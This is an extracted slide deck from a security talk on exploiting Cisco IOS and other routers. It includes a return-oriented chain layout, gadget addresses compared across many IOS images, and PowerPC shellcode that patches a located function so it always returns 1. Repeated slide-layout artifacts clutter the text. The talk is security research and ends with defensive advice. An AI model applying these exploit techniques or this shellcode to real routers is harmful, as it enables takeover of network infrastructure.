FX Router Exploitation
FX Router Exploitation
FX Router Exploitation
Felix FX Lindner
Agenda
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Introduction
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Motivation
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
Vulnerabilities
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Service Vulnerabilities
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Service Vulnerabilities
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Service Vulnerabilities
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Upcoming Vulnerabilities
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
IPv6
VoIP: H.323, H.225.0, H.245.0, SIP
Lawful Interception Functionality
SSL VPN
Web Service Routing
XML-PI
Web Service Management Agent
Transit Vulnerabilities
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
OS Architectures Comparison
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Product
OS Design
Fault Behavior
Exploitability
Cisco IOS
Monolithic ELF
Device Crash
Hard
Cisco Service
Modules
Process Crash /
Module Crash
Interesting
Juniper JUNOS
Process Crash
Probably known
Device Crash
A little tricky
Process Crash
Known
$DSL_Router
Process Crash
Known
Consequences of Design
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
End
0x03FFFFFF
0x60FFFFFF
0x83BFFFFF
Dependencies
0x8095B087
0x80CDBFCB
0x80DECEE7
0x83BFFFFF
Size(b)
4194304
16777216
62914560
9777148
3673924
1117980
48312600
Class
Iomem
Flash
Local
IText
IData
IBss
Local
Media
R/W
R/O
R/W
R/O
R/W
R/W
R/W
Name
iomem
flash
main
main:text
main:data
main:bss
main:heap
Platform
Major / Minor Version
Release Version
Train
Feature-Set
Special Build
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
ROMMON Versions
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Code
41414141
Buffer
41414141
Buffer
41414141
Buffer
41414141
Buffer
FUNC_02:
Memory write!
stw
%r30, 0xAB(%r31)
lwz
%r0, 0x18+arg_4(%sp)
mtlr %r0
lwz
%r28, 0x18+var_10(%sp)
lwz
%r29, 0x18+var_C(%sp)
lwz
%r30, 0x18+var_8(%sp)
lwz
%r31, 0x18+var_4(%sp)
addi %sp, %sp, 0x18
blr
Stack
D-Cache
CPU
AAAAAAAAA
Memory
AAAAAAAAA
I-Cache
stwu
%sp, -0x10(%sp)
mflr
%r0
stw
%r31, 0x10+var_4(%sp)
stw
%r0, 0x10+arg_4(%sp)
bl
Disable_Interrupts
mr
%r31, %r3
mfspr
%r0, dc_cst
cmpwi
cr1, %r0, 0
bge
cr1, NoDataCache
bl
Flush_Data_Cache
bl
Unlock_Data_Cache
bl
Disable_Data_Cache
NoDataCache:
bl
Invalidate_Instruction_Cache
bl
Unlock_Instruction_Cache
bl
Disable_Instruction_Cache
mfmsr
%r0
rlwinm %r0, %r0, 0,28,25
mtmsr
%r0
cmpwi
cr1, %r31, 0
beq
cr1, InterruptsAreOff
bl
EnableInterrupts
InterruptsAreOff:
lwz
%r0, 0x10+arg_4(%sp)
mtlr
%r0
lwz
%r31, 0x10+var_4(%sp)
addi
%sp, %sp, 0x10
blr
IO Memory
AAAAAAAAAAAAA
AAAAAAAA
Return oriented
Cache Disable
Return oriented
memory write
Return oriented
memory write
Execute written
data (code)
P
m tc tr S
bctr
ch
r
a
se
FE
E
F
0x
mtctr SP
bctr
06
1
B
Exception Vectors
Code Segment
Read-Only Data
copy
Second Stage
Code:
Data
Heap
ROMMON
41414141
Buffer
41414141
Buffer
41414141
Buffer
VALUE
saved R30
DEST.PTR
saved R31
41414141
saved SP
FUNC_02
saved LR
saved R28
saved R29
saved R30
saved R31
saved SP
saved LR
stuff
Alternatives to ROMMON
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
8001435c
80014360
80014364
80014368
8001436c
80014370
80014374
80014378
8001437c
80014380
80014384
80014388
8001438c
80014390
80014394
80014398
8001439c
800143a0
c2600-a3jk8s-mz.122-28c
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3jk8s-mz.122-29b
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3jk8s-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3jk8s-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
8001435c
80014360
80014364
80014368
8001436c
80014370
80014374
80014378
8001437c
80014380
80014384
80014388
8001438c
80014390
80014394
80014398
8001439c
800143a0
8001435c
80014360
80014364
80014368
8001436c
80014370
80014374
80014378
8001437c
80014380
80014384
80014388
8001438c
80014390
80014394
80014398
8001439c
800143a0
c2600-a3jk8s-mz.122-28c
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-i-mz.122-28c
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3jk8s-mz.122-29b
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3jk8s-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-i-mz.122-29b
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-i-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3jk8s-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-i-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3js-mz.122-28c
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-io3-mz.122-28c
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3js-mz.122-29b
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3js-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3js-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-io3-mz.122-29b
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-io3-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-io3-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
Code Dissimilarity
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
c2600-a3jk8s-mz.122-28c
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
c2600-a3jk8s-mz.122-29b
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
Identical Features!
Count
Percent
Address
Type
1597
100%
326
20.4%
80009534
249
15.6%
80040990
224
14.0%
80014360
223
13.9%
80040984
210
13.1%
80018554
ROMMON
Perfect addresses
(no dependencies)
Cache disabling
30% chance of success
based on in-the-wild
data
Cannot be fingerprinted
Image Similarity
Likely addresses (code
flow dependencies)
Cache still an issue
13% - 20% chance of
success over all
available images
Can be fingerprinted
Work in progress
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
IOS Shellcode
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Bind Shellcode
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Disassembling Shellcode
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Disassembling Shellcode
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Disassembling Shellcode
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
bl
.code
.string Unique String to look for"
.byte
0x00
.byte
0x00
.code:
mflr %r3
lmw
%r29,0x0(%r3)
lis
%r3,0x8000
ori
%r3,%r3,0x8000
mr
%r5,%r3
.find_r29:
lwz
%r4,0x0(%r3)
cmpw %cr1, %r4, %r29
bne
%cr1, .findnext
lwz
%r4,0x4(%r3)
cmpw %cr1, %r4, %r30
bne
%cr1, .findnext
lwz
%r4,0x8(%r3)
cmpw %cr1, %r4, %r31
beq
%cr1, .stringfound
.findnext:
addi %r3,%r3,4
b
.find_r29
# string address is now in R3
.stringfound:
lis
%r7, 0x3800
rlwinm %r6, %r3, 16, 16, 31
andi.
%r8, %r3, 0xFFFF
or
%r8, %r8, %r7
or
%r7, %r7, %r6
.findlis:
lwz
%r4, 0x0(%r5)
rlwinm %r4, %r4, 0, 0xF81FFFFF
cmpw
%cr1, %r4, %r7
bne
%cr1, .findlisnext
lwz
%r4, 0x4(%r5)
rlwinm %r4, %r4, 0, 0xF800FFFF
cmpw
%cr1, %r4, %r8
beq
%cr1, .loadfound
.findlisnext:
addi
%r5, %r5, 4
b
.findlis
.loadfound:
xor
%r6, %r6, %r6
ori
%r6, %r6, 0x9421
lhz
%r4, 0x0(%r5)
cmpw
%cr1, %r4, %r6
beq
%cr1, .functionFound
addi
%r5, %r5, -4
b
.loadfound
.functionFound:
lis
%r4, 0x3860
ori
%r4, %r4, 0x0001
stw
%r4, 0x0(%r5)
addi
%r5,%r5,4
lis
%r4, 0x4e80
ori
%r4, %r4, 0x0020
stw
%r4, 0x0(%r5)
IOS MITM
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
Good luck!
Prevent traffic destined to any interface of the
router itself at all cost
Very specific exceptions for network management
Dont forget the loopback and tunnel interfaces
Dont forget IPv6
Complain to Cisco
E
D
C
B
A
9
8
7
6
5
4
3
2
1
0
Thank you!
Felix FX Lindner
Head
fx@recurity-labs.com